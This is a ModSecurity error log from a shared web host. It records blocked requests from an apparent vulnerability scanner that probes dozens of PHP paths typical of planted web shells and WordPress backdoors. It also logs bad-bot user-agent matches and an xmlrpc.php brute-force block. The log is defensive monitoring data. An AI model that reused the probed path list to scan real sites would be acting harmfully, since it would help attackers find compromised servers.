[Tue May 26 16:26:21.754816 2026] [security2:error] [pid 795941:tid 796090] [client 114.119.149.142:48951] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/index.php/tag/typography"] [unique_id "ahV8Ve2GQ_TLE_VHIp2jswAAAJg"], referer: https://virgence.com/index.php/tag/typography
[Tue May 26 16:26:21.953785 2026] [security2:error] [pid 795941:tid 796179] [client 20.226.60.108:26873] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV8Ve2GQ_TLE_VHIp2jtQAAAPE"]
[Tue May 26 16:26:21.953904 2026] [security2:error] [pid 795941:tid 796179] [client 20.226.60.108:26873] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahV8Ve2GQ_TLE_VHIp2jtQAAAPE"]
[Tue May 26 16:26:22.231100 2026] [security2:error] [pid 795941:tid 796116] [client 20.104.227.76:19967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.unsobered.moes-art.com"] [uri "/inputs.php"] [unique_id "ahV8Vu2GQ_TLE_VHIp2jwQAAALI"]
[Tue May 26 16:26:22.330499 2026] [security2:error] [pid 795941:tid 796111] [client 20.226.60.108:2177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/php.php"] [unique_id "ahV8Vu2GQ_TLE_VHIp2jwgAAAK0"]
[Tue May 26 16:26:22.330615 2026] [security2:error] [pid 795941:tid 796111] [client 20.226.60.108:2177] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/php.php"] [unique_id "ahV8Vu2GQ_TLE_VHIp2jwgAAAK0"]
[Tue May 26 16:26:22.743989 2026] [security2:error] [pid 795941:tid 796178] [client 20.226.60.108:44925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-Blogs.php"] [unique_id "ahV8Vu2GQ_TLE_VHIp2j0AAAAPA"]
[Tue May 26 16:26:22.744098 2026] [security2:error] [pid 795941:tid 796178] [client 20.226.60.108:44925] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-Blogs.php"] [unique_id "ahV8Vu2GQ_TLE_VHIp2j0AAAAPA"]
[Tue May 26 16:26:23.181125 2026] [security2:error] [pid 795941:tid 796076] [client 20.226.60.108:60695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/index.php"] [unique_id "ahV8V-2GQ_TLE_VHIp2j4gAAAIo"]
[Tue May 26 16:26:23.181227 2026] [security2:error] [pid 795941:tid 796076] [client 20.226.60.108:60695] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/index.php"] [unique_id "ahV8V-2GQ_TLE_VHIp2j4gAAAIo"]
[Tue May 26 16:26:23.343128 2026] [security2:error] [pid 795941:tid 796180] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Vu2GQ_TLE_VHIp2jyAAAAPI"]
[Tue May 26 16:26:23.612185 2026] [security2:error] [pid 795941:tid 796162] [client 20.226.60.108:60751] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahV8V-2GQ_TLE_VHIp2j5wAAAOA"]
[Tue May 26 16:26:23.612320 2026] [security2:error] [pid 795941:tid 796162] [client 20.226.60.108:60751] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahV8V-2GQ_TLE_VHIp2j5wAAAOA"]
[Tue May 26 16:26:23.979270 2026] [security2:error] [pid 795941:tid 796169] [client 20.226.60.108:60745] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ws83.php"] [unique_id "ahV8V-2GQ_TLE_VHIp2j8AAAAOc"]
[Tue May 26 16:26:23.979459 2026] [security2:error] [pid 795941:tid 796169] [client 20.226.60.108:60745] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ws83.php"] [unique_id "ahV8V-2GQ_TLE_VHIp2j8AAAAOc"]
[Tue May 26 16:26:24.385281 2026] [security2:error] [pid 795941:tid 796189] [client 20.226.60.108:35162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/file61.php"] [unique_id "ahV8WO2GQ_TLE_VHIp2j-QAAAPs"]
[Tue May 26 16:26:24.385434 2026] [security2:error] [pid 795941:tid 796189] [client 20.226.60.108:35162] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/file61.php"] [unique_id "ahV8WO2GQ_TLE_VHIp2j-QAAAPs"]
[Tue May 26 16:26:24.758202 2026] [security2:error] [pid 795941:tid 796116] [client 20.226.60.108:26830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/sadcut1.php"] [unique_id "ahV8WO2GQ_TLE_VHIp2kAQAAALI"]
[Tue May 26 16:26:24.758312 2026] [security2:error] [pid 795941:tid 796116] [client 20.226.60.108:26830] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/sadcut1.php"] [unique_id "ahV8WO2GQ_TLE_VHIp2kAQAAALI"]
[Tue May 26 16:26:25.208485 2026] [security2:error] [pid 795941:tid 796147] [client 20.226.60.108:61674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/y.php"] [unique_id "ahV8We2GQ_TLE_VHIp2kEAAAANE"]
[Tue May 26 16:26:25.208599 2026] [security2:error] [pid 795941:tid 796147] [client 20.226.60.108:61674] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/y.php"] [unique_id "ahV8We2GQ_TLE_VHIp2kEAAAANE"]
[Tue May 26 16:26:25.584489 2026] [security2:error] [pid 795941:tid 796076] [client 20.226.60.108:64861] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/666.php"] [unique_id "ahV8We2GQ_TLE_VHIp2kFQAAAIo"]
[Tue May 26 16:26:25.584596 2026] [security2:error] [pid 795941:tid 796076] [client 20.226.60.108:64861] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/666.php"] [unique_id "ahV8We2GQ_TLE_VHIp2kFQAAAIo"]
[Tue May 26 16:26:25.969023 2026] [security2:error] [pid 795941:tid 796150] [client 20.226.60.108:19244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahV8We2GQ_TLE_VHIp2kGwAAANQ"]
[Tue May 26 16:26:25.969127 2026] [security2:error] [pid 795941:tid 796150] [client 20.226.60.108:19244] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/7.php"] [unique_id "ahV8We2GQ_TLE_VHIp2kGwAAANQ"]
[Tue May 26 16:26:26.452961 2026] [security2:error] [pid 795941:tid 796165] [client 20.226.60.108:2566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-config-sample.php"] [unique_id "ahV8Wu2GQ_TLE_VHIp2kLgAAAOM"]
[Tue May 26 16:26:26.453077 2026] [security2:error] [pid 795941:tid 796165] [client 20.226.60.108:2566] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-config-sample.php"] [unique_id "ahV8Wu2GQ_TLE_VHIp2kLgAAAOM"]
[Tue May 26 16:26:26.854014 2026] [security2:error] [pid 795941:tid 796082] [client 20.226.60.108:2234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/log.php"] [unique_id "ahV8Wu2GQ_TLE_VHIp2kTQAAAJA"]
[Tue May 26 16:26:26.854107 2026] [security2:error] [pid 795941:tid 796082] [client 20.226.60.108:2234] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/log.php"] [unique_id "ahV8Wu2GQ_TLE_VHIp2kTQAAAJA"]
[Tue May 26 16:26:26.854988 2026] [security2:error] [pid 795941:tid 796078] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8We2GQ_TLE_VHIp2kDwAAAIw"]
[Tue May 26 16:26:27.196875 2026] [security2:error] [pid 795941:tid 796163] [client 18.192.166.72:16830] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV8W-2GQ_TLE_VHIp2kUgAAAOE"], referer: https://thegoodsporting.com
[Tue May 26 16:26:27.340171 2026] [security2:error] [pid 795941:tid 796135] [client 20.226.60.108:25916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/a5.php"] [unique_id "ahV8W-2GQ_TLE_VHIp2kUwAAAMU"]
[Tue May 26 16:26:27.340302 2026] [security2:error] [pid 795941:tid 796135] [client 20.226.60.108:25916] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/a5.php"] [unique_id "ahV8W-2GQ_TLE_VHIp2kUwAAAMU"]
[Tue May 26 16:26:27.788762 2026] [security2:error] [pid 795941:tid 796072] [client 20.226.60.108:60756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahV8W-2GQ_TLE_VHIp2kXAAAAIY"]
[Tue May 26 16:26:27.788870 2026] [security2:error] [pid 795941:tid 796072] [client 20.226.60.108:60756] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahV8W-2GQ_TLE_VHIp2kXAAAAIY"]
[Tue May 26 16:26:28.189771 2026] [security2:error] [pid 795941:tid 796091] [client 20.226.60.108:26828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/bolt.php"] [unique_id "ahV8XO2GQ_TLE_VHIp2kbwAAAJk"]
[Tue May 26 16:26:28.189962 2026] [security2:error] [pid 795941:tid 796091] [client 20.226.60.108:26828] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/bolt.php"] [unique_id "ahV8XO2GQ_TLE_VHIp2kbwAAAJk"]
[Tue May 26 16:26:28.341798 2026] [security2:error] [pid 795941:tid 796190] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Wu2GQ_TLE_VHIp2kNwAAAPw"]
[Tue May 26 16:26:28.561708 2026] [security2:error] [pid 795941:tid 796077] [client 20.226.60.108:60772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV8XO2GQ_TLE_VHIp2kfAAAAIs"]
[Tue May 26 16:26:28.561804 2026] [security2:error] [pid 795941:tid 796077] [client 20.226.60.108:60772] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV8XO2GQ_TLE_VHIp2kfAAAAIs"]
[Tue May 26 16:26:28.966656 2026] [security2:error] [pid 795941:tid 796090] [client 20.226.60.108:19245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/jga.php"] [unique_id "ahV8XO2GQ_TLE_VHIp2khgAAAJg"]
[Tue May 26 16:26:28.966789 2026] [security2:error] [pid 795941:tid 796090] [client 20.226.60.108:19245] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/jga.php"] [unique_id "ahV8XO2GQ_TLE_VHIp2khgAAAJg"]
[Tue May 26 16:26:29.229883 2026] [security2:error] [pid 795941:tid 796008] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8Xe2GQ_TLE_VHIp2kjgAAtEI"]
[Tue May 26 16:26:29.230106 2026] [security2:error] [pid 795941:tid 796118] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8Xe2GQ_TLE_VHIp2kjgAAtEI"]
[Tue May 26 16:26:29.379535 2026] [security2:error] [pid 795941:tid 796150] [client 20.226.60.108:51888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahV8Xe2GQ_TLE_VHIp2kjwAAANQ"]
[Tue May 26 16:26:29.379653 2026] [security2:error] [pid 795941:tid 796150] [client 20.226.60.108:51888] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahV8Xe2GQ_TLE_VHIp2kjwAAANQ"]
[Tue May 26 16:26:29.800753 2026] [security2:error] [pid 795941:tid 796137] [client 20.226.60.108:26827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/vx.php"] [unique_id "ahV8Xe2GQ_TLE_VHIp2kkwAAAMc"]
[Tue May 26 16:26:29.800883 2026] [security2:error] [pid 795941:tid 796137] [client 20.226.60.108:26827] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/vx.php"] [unique_id "ahV8Xe2GQ_TLE_VHIp2kkwAAAMc"]
[Tue May 26 16:26:30.113800 2026] [security2:error] [pid 795941:tid 796186] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8XO2GQ_TLE_VHIp2kgQAAAPg"]
[Tue May 26 16:26:30.171984 2026] [security2:error] [pid 795941:tid 796122] [client 20.226.60.108:48675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ws77.php"] [unique_id "ahV8Xu2GQ_TLE_VHIp2kmwAAALg"]
[Tue May 26 16:26:30.172074 2026] [security2:error] [pid 795941:tid 796122] [client 20.226.60.108:48675] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/ws77.php"] [unique_id "ahV8Xu2GQ_TLE_VHIp2kmwAAALg"]
[Tue May 26 16:26:30.359924 2026] [security2:error] [pid 795941:tid 796132] [client 104.23.221.49:10045] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "lagoslawntennisclub1895.com"] [uri "/wp-admin/install.php"] [unique_id "ahV8Xu2GQ_TLE_VHIp2knAAAAMI"]
[Tue May 26 16:26:30.570534 2026] [security2:error] [pid 795941:tid 796078] [client 20.226.60.108:61647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/2.php"] [unique_id "ahV8Xu2GQ_TLE_VHIp2kpAAAAIw"]
[Tue May 26 16:26:30.570671 2026] [security2:error] [pid 795941:tid 796078] [client 20.226.60.108:61647] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/2.php"] [unique_id "ahV8Xu2GQ_TLE_VHIp2kpAAAAIw"]
[Tue May 26 16:26:30.905257 2026] [security2:error] [pid 795941:tid 796097] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Xu2GQ_TLE_VHIp2kmQAAAJ8"]
[Tue May 26 16:26:30.928185 2026] [security2:error] [pid 795941:tid 796096] [client 20.226.60.108:26849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahV8Xu2GQ_TLE_VHIp2krAAAAJ4"]
[Tue May 26 16:26:30.928294 2026] [security2:error] [pid 795941:tid 796096] [client 20.226.60.108:26849] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahV8Xu2GQ_TLE_VHIp2krAAAAJ4"]
[Tue May 26 16:26:31.380059 2026] [security2:error] [pid 795941:tid 796145] [client 20.226.60.108:44919] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahV8X-2GQ_TLE_VHIp2kuAAAAM8"]
[Tue May 26 16:26:31.380145 2026] [security2:error] [pid 795941:tid 796145] [client 20.226.60.108:44919] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahV8X-2GQ_TLE_VHIp2kuAAAAM8"]
[Tue May 26 16:26:31.751546 2026] [security2:error] [pid 795941:tid 796152] [client 20.226.60.108:35149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "theconservativenextdoor.us.md-74.webhostbox.net"] [uri "/asd.php"] [unique_id "ahV8X-2GQ_TLE_VHIp2kvwAAANY"]
